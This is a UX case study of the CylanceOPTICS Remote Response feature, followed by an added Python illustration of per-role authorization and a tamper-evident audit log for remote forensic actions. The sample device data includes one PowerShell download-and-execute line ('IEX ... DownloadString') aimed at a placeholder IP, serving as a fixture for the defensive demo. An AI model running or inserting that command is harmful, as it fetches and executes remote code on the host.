Cylance – Enhancing Incident Response

Case Study


CylanceOPTICS is an EDR (Endpoint Detection & Response) product built primarily around threat hunting and root cause analysis when a breach or suspected breach occurs in a company's environment. It consists of a suite of tools that help forensic teams determine how a threat got into their network and remediate it quickly.

Problem to Solve:

When a threat occurs on one or more devices, a user needs to perform forensic actions on the device in question, such as viewing logs, stopping processes and collecting files of interest for further evaluation. Currently, a user has to remote-shell into that system and perform these actions outside the product, using different software for each operating system. This is a cumbersome process that takes them out of their investigative workflow.

Goals & Proposed Solution

Create a method for connecting to a device through CylanceOPTICS that retains the user's workflow and is platform agnostic. The solution needs to be secure, fast and in line with the investigative workflow.

  • Provide a remote terminal experience
  • Keep the user within their workflow; this is crucial
  • Secure, fast connection
  • Operating system agnostic

Cylance EDR Users

Remote Response was a new feature in a well-defined product, so we knew who our users were from previous research. We targeted this user group for feedback and testing throughout the project.

Research for Requirements

An issue from the start of the project was the lack of requirements: the feature was a contractual obligation with a short time to build. We created a survey and interviewed internal teams as well as customers to find out what they liked about their current workflow and what could be better. We then collected the data, compared responses across users and internal teams, and identified the patterns that stood out.

Design

Defining touchpoints and information architecture was the first step. The visual style was then derived from the standard terminal windows admins are used to, with some retro ASCII art to make the feature 'sticky'. Multiple window sizes were also implemented so a user can work in the terminal while navigating the rest of the app.

Inline Workflow

Working across multiple pages while retaining the session was key to letting users connect to devices without leaving their workflow (example shown here).

Feedback

While this was a recently released feature at the time of writing, we were still able to collect some quick feedback from internal teams and key customers to see what worked and what could be improved.

  • Users stay logged into app longer
  • Great tool to demo for sales
  • Audit log helpful for admins
  • Need more robust RBAC model
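
The last two feedback items are the security-relevant ones for a feature that opens a remote shell on endpoints from a management console: every action should be authorized per role before it reaches the device, and every request, allowed or denied, should land in a tamper-evident audit log. The following is an added illustration of that gate, not Cylance code and not a description of how CylanceOPTICS implements it. The role names, the three action names (taken from the problem statement: view logs, stop a process, collect a file), the audit record format and the in-memory device state are all assumptions constructed so the module runs offline.

```python
"""Authorization and audit gate for an EDR remote-response console.

Added example, not Cylance code. Roles, action names and the audit record
layout are assumptions; DEVICE_STATE is constructed sample data.
"""
import copy
import hashlib
import json
from dataclasses import dataclass
from itertools import count

# The three forensic actions named in the problem statement.
ACTIONS = frozenset({"view_logs", "stop_process", "collect_file"})

# Hypothetical least-privilege role matrix: a read-only analyst can look at a
# host but cannot change its state or pull files off it.
ROLE_PERMISSIONS = {
    "read_only_analyst": frozenset({"view_logs"}),
    "responder": ACTIONS,
    "admin": ACTIONS,
}

# Constructed endpoint state standing in for a real agent on the device.
DEVICE_STATE = {
    "WS-0042": {
        "logs": [
            "2024-01-01T00:00:00Z powershell.exe spawned by winword.exe",
            "2024-01-01T00:00:03Z outbound connection to 203.0.113.7:443",
        ],
        "processes": {4242: "powershell.exe", 1312: "winword.exe"},
        "files": {"C:\\Users\\Public\\update.ps1": b"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"},
    }
}


def fresh_device_state():
    """Deep copy so repeated runs start from the same constructed state."""
    return copy.deepcopy(DEVICE_STATE)


@dataclass(frozen=True)
class Session:
    user: str
    role: str
    device_id: str


class AuditLog:
    """Append-only, SHA-256 hash-chained trail: editing, reordering or dropping
    an entry after the fact makes verify() return False."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []
        self._seq = count(1)
        self._prev = self.GENESIS

    @staticmethod
    def _digest(record):
        body = {k: v for k, v in record.items() if k != "hash"}
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

    def append(self, **fields):
        record = dict(fields, seq=next(self._seq), prev_hash=self._prev)
        record["hash"] = self._digest(record)
        self.entries.append(record)
        self._prev = record["hash"]
        return record

    def verify(self):
        prev = self.GENESIS
        for entry in self.entries:
            if entry["prev_hash"] != prev or self._digest(entry) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True


class RemoteResponseGateway:
    """Authorizes each request against the role matrix and records it in the
    audit log before anything touches the device; denials are logged too."""

    def __init__(self, audit_log, device_state):
        self.audit = audit_log
        self.devices = device_state

    def execute(self, session, action, argument=None):
        permitted = action in ACTIONS and action in ROLE_PERMISSIONS.get(session.role, frozenset())
        self.audit.append(user=session.user, role=session.role, device=session.device_id,
                          action=action, argument=str(argument),
                          decision="allow" if permitted else "deny")
        if not permitted:
            raise PermissionError(f"role {session.role!r} may not run {action!r}")
        device = self.devices[session.device_id]
        if action == "view_logs":
            return list(device["logs"])
        if action == "stop_process":
            name = device["processes"].pop(argument, None)
            return {"stopped": name is not None, "pid": argument, "name": name}
        # collect_file: return a hash so the analyst can verify the copy they receive.
        data = device["files"][argument]
        return {"path": argument, "size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


if __name__ == "__main__":
    log = AuditLog()
    gw = RemoteResponseGateway(log, fresh_device_state())
    gw.execute(Session("alice", "read_only_analyst", "WS-0042"), "view_logs")
    try:
        gw.execute(Session("alice", "read_only_analyst", "WS-0042"), "stop_process", 4242)
    except PermissionError as err:
        print("denied:", err)
    gw.execute(Session("bob", "responder", "WS-0042"), "stop_process", 4242)
    for entry in log.entries:
        print(entry["seq"], entry["user"], entry["action"], entry["decision"], entry["hash"][:12])
    print("audit chain intact:", log.verify())
```

The point of logging before dispatching, and of logging denials, is that a console compromise or an over-privileged role shows up in the audit trail even when the device never ran anything; the hash chain gives the admin a way to check that the log they are reading is the one the gateway wrote.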